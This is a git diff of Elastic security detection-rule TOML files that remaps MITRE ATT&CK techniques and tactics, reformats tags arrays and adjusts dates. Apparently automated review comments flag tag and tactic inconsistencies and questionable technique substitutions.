a/rules_building_block/discovery_posh_password_policy.toml +++ b/rules_building_block/discovery_posh_password_policy.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/12" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] 
@@ -88,7 +88,16 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Discovery", "Data Source: PowerShell Logs", "Rule Type: BBR", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Tactic: Execution", + "Data Source: PowerShell Logs", + "Rule Type: BBR", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -133,16 +142,34 @@ not user.id : "S-1-5-18" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1201" name = "Password Policy Discovery" reference = "https://attack.mitre.org/techniques/T1201/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules_building_block/discovery_post_exploitation_external_ip_lookup.toml b/rules_building_block/discovery_post_exploitation_external_ip_lookup.toml index b27f77bdb79..ca94235feb2 100644 --- a/rules_building_block/discovery_post_exploitation_external_ip_lookup.toml +++ b/rules_building_block/discovery_post_exploitation_external_ip_lookup.toml 
@@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2020/09/04" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/05/21" [rule] author = ["Elastic"] @@ -133,18 +133,24 @@ network where host.os.type == "windows" and network.protocol == "dns" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1016" name = "System Network Configuration Discovery" reference = "https://attack.mitre.org/techniques/T1016/" - [[rule.threat.technique.subtechnique]] id = "T1016.001" name = "Internet Connection Discovery" reference = "https://attack.mitre.org/techniques/T1016/001/" + +[[rule.threat.technique]] +id = "T1614" +name = "System Location Discovery" +reference = "https://attack.mitre.org/techniques/T1614/" + + [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + diff --git a/rules_building_block/discovery_potential_memory_seeking_activity.toml b/rules_building_block/discovery_potential_memory_seeking_activity.toml index 35696a3bf62..1296b79194d 100644 --- a/rules_building_block/discovery_potential_memory_seeking_activity.toml +++ b/rules_building_block/discovery_potential_memory_seeking_activity.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2024/02/01" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/24" [rule] author = ["Elastic"] @@ -58,3 +58,15 @@ process where host.os.type == "linux" and event.type == "start" and event.action ) ''' +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1057" +name = "Process Discovery" +reference = "https://attack.mitre.org/techniques/T1057/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" 
diff --git a/rules_building_block/discovery_process_discovery_via_builtin_tools.toml b/rules_building_block/discovery_process_discovery_via_builtin_tools.toml index c11eb222786..8b0c1ba8a90 100644 --- a/rules_building_block/discovery_process_discovery_via_builtin_tools.toml +++ b/rules_building_block/discovery_process_discovery_via_builtin_tools.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/11" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/02" [rule] author = ["Elastic"] @@ -51,10 +51,21 @@ id = "T1057" name = "Process Discovery" reference = "https://attack.mitre.org/techniques/T1057/" +[[rule.threat.technique]] +id = "T1518" +name = "Software Discovery" +reference = "https://attack.mitre.org/techniques/T1518/" + +[[rule.threat.technique.subtechnique]] +id = "T1518.001" +name = "Security Software Discovery" +reference = "https://attack.mitre.org/techniques/T1518/001/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + [rule.new_terms] field = "new_terms_fields" value = ["process.parent.executable", "process.command_line", "host.id"] diff --git a/rules_building_block/discovery_remote_system_discovery_commands_windows.toml b/rules_building_block/discovery_remote_system_discovery_commands_windows.toml index 6efa2a5e64d..49272de507f 100644 --- a/rules_building_block/discovery_remote_system_discovery_commands_windows.toml +++ b/rules_building_block/discovery_remote_system_discovery_commands_windows.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2020/12/04" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -93,7 +93,6 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1016" name = "System Network Configuration Discovery" 
@@ -104,17 +103,9 @@ id = "T1018" name = "Remote System Discovery" reference = "https://attack.mitre.org/techniques/T1018/" -[[rule.threat.technique]] -id = "T1069" -name = "Permission Groups Discovery" -reference = "https://attack.mitre.org/techniques/T1069/" - -[[rule.threat.technique.subtechnique]] -id = "T1069.002" -name = "Domain Groups" -reference = "https://attack.mitre.org/techniques/T1069/002/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + diff --git a/rules_building_block/discovery_security_software_wmic.toml b/rules_building_block/discovery_security_software_wmic.toml index cc4036d6568..ace9b215e1b 100644 --- a/rules_building_block/discovery_security_software_wmic.toml +++ b/rules_building_block/discovery_security_software_wmic.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2020/10/19" integration = ["endpoint", "windows", "system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -77,18 +77,31 @@ process.args : "/namespace:\\\\root\\SecurityCenter2" and process.args : "Get" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1518" name = "Software Discovery" reference = "https://attack.mitre.org/techniques/T1518/" - [[rule.threat.technique.subtechnique]] id = "T1518.001" name = "Security Software Discovery" reference = "https://attack.mitre.org/techniques/T1518/001/" + + [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1047" +name = "Windows Management Instrumentation" +reference = "https://attack.mitre.org/techniques/T1047/" + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + 
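Review bot: The added `[[rule.threat]]` entry in discovery_security_software_wmic.toml introduces a second tactic, `TA0002` Execution (`T1047`), but no `tags` hunk for that file appears in this diff, so unless the existing tags line already contains `"Tactic: Execution"` the tag/tactic consistency check will report it as missing. The other file in this diff that gains an Execution entry with a query-only rule (discovery_posh_password_policy.toml) updates its tags in the same patch; this one should too. The file's tags line is outside the visible hunks, so I cannot confirm its current contents here.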
diff --git a/rules_building_block/discovery_suspicious_proc_enumeration.toml b/rules_building_block/discovery_suspicious_proc_enumeration.toml index ecbdf328a3a..5416dfa0a22 100644 --- a/rules_building_block/discovery_suspicious_proc_enumeration.toml +++ b/rules_building_block/discovery_suspicious_proc_enumeration.toml @@ -2,7 +2,7 @@ creation_date = "2023/06/09" integration = ["auditd_manager"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/05/21" [rule] author = ["Elastic"] @@ -62,16 +62,22 @@ file.path : (/proc/*/cmdline or /proc/*/stat or /proc/*/exe) and not process.nam [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1057" name = "Process Discovery" reference = "https://attack.mitre.org/techniques/T1057/" +[[rule.threat.technique]] +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" + + [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + [rule.threshold] field = ["host.id", "process.pid", "process.name"] value = 1 diff --git a/rules_building_block/discovery_system_network_connections.toml b/rules_building_block/discovery_system_network_connections.toml index 64bbd52e576..b226cb4c1aa 100644 --- a/rules_building_block/discovery_system_network_connections.toml +++ b/rules_building_block/discovery_system_network_connections.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/11" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/02" [rule] author = ["Elastic"] @@ -45,11 +45,6 @@ not ( [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1016" -name = "System Network Configuration Discovery" -reference = "https://attack.mitre.org/techniques/T1016/" - [[rule.threat.technique]] id = "T1049" name = "System Network Connections Discovery" 
@@ -59,6 +54,7 @@ reference = "https://attack.mitre.org/techniques/T1049/" id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + [rule.new_terms] field = "new_terms_fields" value = ["process.parent.executable", "process.command_line", "host.id"] diff --git a/rules_building_block/discovery_system_service_discovery.toml b/rules_building_block/discovery_system_service_discovery.toml index 1f8c79219de..4810cc175fd 100644 --- a/rules_building_block/discovery_system_service_discovery.toml +++ b/rules_building_block/discovery_system_service_discovery.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/01/24" integration = ["windows", "endpoint", "system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/17" [rule] author = ["Elastic"] @@ -70,18 +70,14 @@ process where host.os.type == "windows" and event.type == "start" and process.pa [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1007" name = "System Service Discovery" reference = "https://attack.mitre.org/techniques/T1007/" -[[rule.threat.technique]] -id = "T1135" -name = "Network Share Discovery" -reference = "https://attack.mitre.org/techniques/T1135/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + diff --git a/rules_building_block/discovery_win_network_connections.toml b/rules_building_block/discovery_win_network_connections.toml index 6fd29c4a0e4..dc1f9d25751 100644 --- a/rules_building_block/discovery_win_network_connections.toml +++ b/rules_building_block/discovery_win_network_connections.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/07/14" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/05/21" [rule] author = ["Elastic"] 
@@ -52,28 +52,19 @@ process where event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1016" -name = "System Network Configuration Discovery" -reference = "https://attack.mitre.org/techniques/T1016/" - [[rule.threat.technique]] id = "T1049" name = "System Network Connections Discovery" reference = "https://attack.mitre.org/techniques/T1049/" [[rule.threat.technique]] -id = "T1087" -name = "Account Discovery" -reference = "https://attack.mitre.org/techniques/T1087/" +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" -[[rule.threat.technique]] -id = "T1135" -name = "Network Share Discovery" -reference = "https://attack.mitre.org/techniques/T1135/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + diff --git a/rules_building_block/entra_id_identity_protection_risk_detections.toml b/rules_building_block/entra_id_identity_protection_risk_detections.toml index d1a6a5ecaf6..ba23d68e913 100644 --- a/rules_building_block/entra_id_identity_protection_risk_detections.toml +++ b/rules_building_block/entra_id_identity_protection_risk_detections.toml @@ -4,7 +4,7 @@ creation_date = "2025/05/18" integration = ["azure"] maturity = "production" promotion = true -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] 
@@ -29,7 +29,16 @@ risk_score = 47 rule_id = "da0d4bae-33ee-11f0-a59f-f661ea17fbcd" setup = "" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Credential Access", "Tactic: Initial Access", "Data Source: Azure", "Data Source: Microsoft Entra ID", "Data Source: Microsoft Entra ID Protection", "Data Source: Microsoft Entra ID Protection Logs", "Use Case: Identity and Access Audit", "Use Case: Threat Detection", "Rule Type: BBR"] +tags = [ + "Domain: Cloud", + "Data Source: Azure", + "Data Source: Microsoft Entra ID", + "Data Source: Microsoft Entra ID Protection", + "Data Source: Microsoft Entra ID Protection Logs", + "Use Case: Identity and Access Audit", + "Use Case: Threat Detection", + "Rule Type: BBR", +] timestamp_override = "event.ingested" type = "query" @@ -37,38 +46,3 @@ query = ''' event.dataset: "azure.identity_protection" ''' -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1110" -name = "Brute Force" -reference = "https://attack.mitre.org/techniques/T1110/" - -[[rule.threat.technique.subtechnique]] -id = "T1110.003" -name = "Password Spraying" -reference = "https://attack.mitre.org/techniques/T1110/003/" - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules_building_block/execution_aws_lambda_function_updated.toml b/rules_building_block/execution_aws_lambda_function_updated.toml index a6e9fa6842e..773ea2fdede 100644 --- a/rules_building_block/execution_aws_lambda_function_updated.toml 
+++ b/rules_building_block/execution_aws_lambda_function_updated.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2024/04/20" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/09/01" [rule] author = ["Elastic"] @@ -36,7 +36,15 @@ references = [ risk_score = 21 rule_id = "1251b98a-ff45-11ee-89a1-f661ea17fbce" severity = "low" -tags = ["Domain: Cloud", "Tactic: Execution", "Tactic: Persistence", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS Lambda", "Use Case: Asset Visibility", "Rule Type: BBR"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS Lambda", + "Use Case: Asset Visibility", + "Tactic: Execution", + "Rule Type: BBR" +] timestamp_override = "event.ingested" type = "query" @@ -50,31 +58,14 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1648" name = "Serverless Execution" reference = "https://attack.mitre.org/techniques/T1648/" + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1505" -name = "Server Software Component" -reference = "https://attack.mitre.org/techniques/T1505/" - -[[rule.threat.technique.subtechnique]] -id = "T1505.006" -name = "vSphere Installation Bundles" -reference = "https://attack.mitre.org/techniques/T1505/006/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules_building_block/execution_github_new_event_action_for_pat.toml b/rules_building_block/execution_github_new_event_action_for_pat.toml index 9f0a71e6543..481941c1220 100644 --- a/rules_building_block/execution_github_new_event_action_for_pat.toml +++ b/rules_building_block/execution_github_new_event_action_for_pat.toml 
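Review bot: The rewritten `tags` array in execution_aws_lambda_function_updated.toml ends with `"Rule Type: BBR"` and no trailing comma, while every other multi-line `tags` array in this diff closes its last element with a trailing comma. It parses either way, but the inconsistency turns the next tag addition into a two-line change; add the comma. Dropping the `T1505.006` / Persistence entry is sound, since a vSphere Installation Bundles sub-technique did not describe a Lambda `UpdateFunctionCode`-style event.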
@@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/10/11" integration = ["github"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/24" [rule] author = ["Elastic"] @@ -17,7 +17,14 @@ name = "First Occurrence GitHub Event for a Personal Access Token (PAT)" risk_score = 21 rule_id = "ce08b55a-f67d-4804-92b5-617b0fe5a5b5" severity = "low" -tags = ["Domain: Cloud", "Use Case: Threat Detection", "Use Case: UEBA", "Rule Type: BBR", "Tactic: Persistence", "Data Source: Github"] +tags = [ + "Domain: Cloud", + "Use Case: Threat Detection", + "Use Case: UEBA", + "Tactic: Execution", + "Rule Type: BBR", + "Data Source: Github", +] timestamp_override = "event.ingested" type = "new_terms" @@ -30,21 +37,17 @@ github.programmatic_access_type:("OAuth access token" or "Fine-grained personal [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" +id = "T1648" +name = "Serverless Execution" +reference = "https://attack.mitre.org/techniques/T1648/" -[[rule.threat.technique.subtechnique]] -id = "T1098.001" -name = "Additional Cloud Credentials" -reference = "https://attack.mitre.org/techniques/T1098/001/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.new_terms] field = "new_terms_fields" value = ["github.hashed_token", "event.action"] diff --git a/rules_building_block/execution_github_new_repo_interaction_for_pat.toml b/rules_building_block/execution_github_new_repo_interaction_for_pat.toml index d214860a434..cb75d586d8b 100644 --- a/rules_building_block/execution_github_new_repo_interaction_for_pat.toml +++ b/rules_building_block/execution_github_new_repo_interaction_for_pat.toml 
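Review bot: Replacing the `T1098.001` / Persistence mapping with `T1648` Serverless Execution in execution_github_new_event_action_for_pat.toml is hard to justify from the query: T1648 covers abuse of cloud serverless compute, whereas this rule fires on the first occurrence of an audit `event.action` for a personal access token, which the previous mapping described more directly. The same `T1648` / `TA0002` substitution is applied in the following hunks to execution_github_new_repo_interaction_for_pat.toml, execution_github_new_repo_interaction_for_user.toml and execution_github_repo_interaction_from_new_ip.toml (replacing `T1213.003` Code Repositories) and to execution_github_repo_created.toml (replacing `T1583.006` Web Services). If the goal is to align the mappings with the files' `execution_` prefix, renaming the files or recording the rationale in each description would preserve the more specific techniques; otherwise I would keep the original mappings.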
@@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/10/11" integration = ["github"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/24" [rule] author = ["Elastic"] @@ -17,7 +17,14 @@ name = "First Occurrence of Private Repo Event from Specific GitHub Personal Acc risk_score = 21 rule_id = "1e9b271c-8caa-4e20-aed8-e91e34de9283" severity = "low" -tags = ["Domain: Cloud", "Use Case: Threat Detection", "Use Case: UEBA", "Rule Type: BBR", "Tactic: Collection", "Data Source: Github"] +tags = [ + "Domain: Cloud", + "Use Case: Threat Detection", + "Use Case: UEBA", + "Tactic: Execution", + "Rule Type: BBR", + "Data Source: Github", +] timestamp_override = "event.ingested" type = "new_terms" @@ -31,21 +38,17 @@ github.repository_public:false [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1213" -name = "Data from Information Repositories" -reference = "https://attack.mitre.org/techniques/T1213/" +id = "T1648" +name = "Serverless Execution" +reference = "https://attack.mitre.org/techniques/T1648/" -[[rule.threat.technique.subtechnique]] -id = "T1213.003" -name = "Code Repositories" -reference = "https://attack.mitre.org/techniques/T1213/003/" [rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.new_terms] field = "new_terms_fields" value = ["github.hashed_token", "github.repo"] diff --git a/rules_building_block/execution_github_new_repo_interaction_for_user.toml b/rules_building_block/execution_github_new_repo_interaction_for_user.toml index 50b57366d35..ba867350a28 100644 --- a/rules_building_block/execution_github_new_repo_interaction_for_user.toml +++ b/rules_building_block/execution_github_new_repo_interaction_for_user.toml 
@@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/10/11" integration = ["github"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/24" [rule] author = ["Elastic"] @@ -17,7 +17,14 @@ name = "First Occurrence of GitHub User Interaction with Private Repo" risk_score = 21 rule_id = "01c49712-25bc-49d2-a27d-d7ce52f5dc49" severity = "low" -tags = ["Domain: Cloud", "Use Case: Threat Detection", "Use Case: UEBA", "Rule Type: BBR", "Tactic: Collection", "Data Source: Github"] +tags = [ + "Domain: Cloud", + "Use Case: Threat Detection", + "Use Case: UEBA", + "Tactic: Execution", + "Rule Type: BBR", + "Data Source: Github", +] timestamp_override = "event.ingested" type = "new_terms" @@ -30,21 +37,17 @@ github.repository_public:false [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1213" -name = "Data from Information Repositories" -reference = "https://attack.mitre.org/techniques/T1213/" +id = "T1648" +name = "Serverless Execution" +reference = "https://attack.mitre.org/techniques/T1648/" -[[rule.threat.technique.subtechnique]] -id = "T1213.003" -name = "Code Repositories" -reference = "https://attack.mitre.org/techniques/T1213/003/" [rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.new_terms] field = "new_terms_fields" value = ["user.name", "github.repo"] diff --git a/rules_building_block/execution_github_repo_created.toml b/rules_building_block/execution_github_repo_created.toml index a21707d6f12..0b5f2635db1 100644 --- a/rules_building_block/execution_github_repo_created.toml +++ b/rules_building_block/execution_github_repo_created.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/10/11" integration = ["github"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] 
@@ -17,7 +17,14 @@ name = "GitHub Repo Created" risk_score = 21 rule_id = "6cea88e4-6ce2-4238-9981-a54c140d6336" severity = "low" -tags = ["Domain: Cloud", "Use Case: Threat Detection", "Use Case: UEBA", "Rule Type: BBR", "Tactic: Resource Development", "Data Source: Github"] +tags = [ + "Domain: Cloud", + "Use Case: Threat Detection", + "Use Case: UEBA", + "Tactic: Execution", + "Rule Type: BBR", + "Data Source: Github", +] timestamp_override = "event.ingested" type = "eql" @@ -28,18 +35,14 @@ configuration where event.dataset == "github.audit" and event.action == "repo.cr [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1583" -name = "Acquire Infrastructure" -reference = "https://attack.mitre.org/techniques/T1583/" +id = "T1648" +name = "Serverless Execution" +reference = "https://attack.mitre.org/techniques/T1648/" -[[rule.threat.technique.subtechnique]] -id = "T1583.006" -name = "Web Services" -reference = "https://attack.mitre.org/techniques/T1583/006/" [rule.threat.tactic] -id = "TA0042" -name = "Resource Development" -reference = "https://attack.mitre.org/tactics/TA0042/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules_building_block/execution_github_repo_interaction_from_new_ip.toml b/rules_building_block/execution_github_repo_interaction_from_new_ip.toml index 4c857b6a80f..33a822c8378 100644 --- a/rules_building_block/execution_github_repo_interaction_from_new_ip.toml +++ b/rules_building_block/execution_github_repo_interaction_from_new_ip.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/10/11" integration = ["github"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/24" [rule] author = ["Elastic"] 
@@ -17,7 +17,14 @@ name = "First Occurrence of GitHub Repo Interaction From a New IP" risk_score = 21 rule_id = "0294f105-d7af-4a02-ae90-35f56763ffa2" severity = "low" -tags = ["Domain: Cloud", "Use Case: Threat Detection", "Use Case: UEBA", "Rule Type: BBR", "Tactic: Collection", "Data Source: Github"] +tags = [ + "Domain: Cloud", + "Use Case: Threat Detection", + "Use Case: UEBA", + "Tactic: Execution", + "Rule Type: BBR", + "Data Source: Github", +] timestamp_override = "event.ingested" type = "new_terms" @@ -30,21 +37,17 @@ github.repository_public:false [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1213" -name = "Data from Information Repositories" -reference = "https://attack.mitre.org/techniques/T1213/" +id = "T1648" +name = "Serverless Execution" +reference = "https://attack.mitre.org/techniques/T1648/" -[[rule.threat.technique.subtechnique]] -id = "T1213.003" -name = "Code Repositories" -reference = "https://attack.mitre.org/techniques/T1213/003/" [rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.new_terms] field = "new_terms_fields" value = ["github.repo", "github.actor_ip"] diff --git a/rules_building_block/execution_linux_segfault.toml b/rules_building_block/execution_linux_segfault.toml index 50dbe75c7ed..e1d006ca679 100644 --- a/rules_building_block/execution_linux_segfault.toml +++ b/rules_building_block/execution_linux_segfault.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/10/26" integration = ["system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/05/21" [rule] author = ["Elastic"] 
@@ -55,3 +55,11 @@ host.os.type:linux and event.dataset:"system.syslog" and process.name:kernel and ''' +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules_building_block/execution_mcp_server_child_process.toml b/rules_building_block/execution_mcp_server_child_process.toml index c29262c19e5..12629a21bf0 100644 --- a/rules_building_block/execution_mcp_server_child_process.toml +++ b/rules_building_block/execution_mcp_server_child_process.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/04" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/03" [rule] author = ["Elastic"] @@ -121,26 +121,14 @@ process where event.type == "start" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATLAS" - -[[rule.threat.technique]] -id = "AML.T0053" -name = "AI Agent Tool Invocation" -reference = "https://atlas.mitre.org/techniques/AML.T0053/" - -[rule.threat.tactic] -id = "AML.TA0005" -name = "Execution" -reference = "https://atlas.mitre.org/tactics/AML.TA0005/" diff --git a/rules_building_block/execution_settingcontent_ms_file_creation.toml b/rules_building_block/execution_settingcontent_ms_file_creation.toml index 5ca6627651a..1c014464624 100644 --- a/rules_building_block/execution_settingcontent_ms_file_creation.toml +++ b/rules_building_block/execution_settingcontent_ms_file_creation.toml 
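Review bot: The `[[rule.threat]]` block added to execution_linux_segfault.toml carries only `[rule.threat.tactic]` TA0002 with no `[[rule.threat.technique]]`, so it adds a tactic label without any ATT&CK technique coverage, and the file's `tags` line is outside the hunk, so it is not visible whether a matching `"Tactic: Execution"` tag exists; the convention across the rule files in this patch is that each `[rule.threat.tactic]` name has a `Tactic:` tag. The same situation — new tactics added while the `tags` line is not part of the hunk — recurs in impact_github_pat_access_revoked.toml (TA0040), initial_access_microsoft_air_investigation_signal.toml (TA0001, TA0002), initial_access_microsoft_defender_alerts_signal.toml (TA0001, TA0002, TA0005, all tactic-only) and initial_access_microsoft_purview_security_compliance_signal.toml (five tactic-only entries). Please confirm each of those files' `tags` gains one `Tactic:` entry per added tactic, and add a `[[rule.threat.technique]]` wherever one is identifiable so the entry is not tactic-only.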
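Review bot: The `@@ -121,26 +121,14 @@` hunk for execution_mcp_server_child_process.toml deletes the entire MITRE ATLAS `[[rule.threat]]` entry (AML.T0053 AI Agent Tool Invocation / AML.TA0005 Execution), leaving only the ATT&CK T1059 mapping for a rule about child processes spawned by an MCP server. Nothing in the hunk replaces that framework coverage, and a rule specifically about agent tool invocation is the case an ATLAS mapping exists for. If the entry was removed because both frameworks name their tactic "Execution" and a duplicate-tactic check rejected the pair, the fix belongs in the check (treat duplicates per framework and tactic) rather than in the rule; otherwise keep the removed `framework = "MITRE ATLAS"` block.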
@@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/08/24" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -21,7 +21,16 @@ references = ["https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f risk_score = 21 rule_id = "1e6363a6-3af5-41d4-b7ea-d475389c0ceb" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Defend", "Rule Type: BBR", "Data Source: Sysmon", "Data Source: Elastic Endgame"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Rule Type: BBR", + "Data Source: Sysmon", + "Data Source: Elastic Endgame", +] timestamp_override = "event.ingested" type = "eql" 
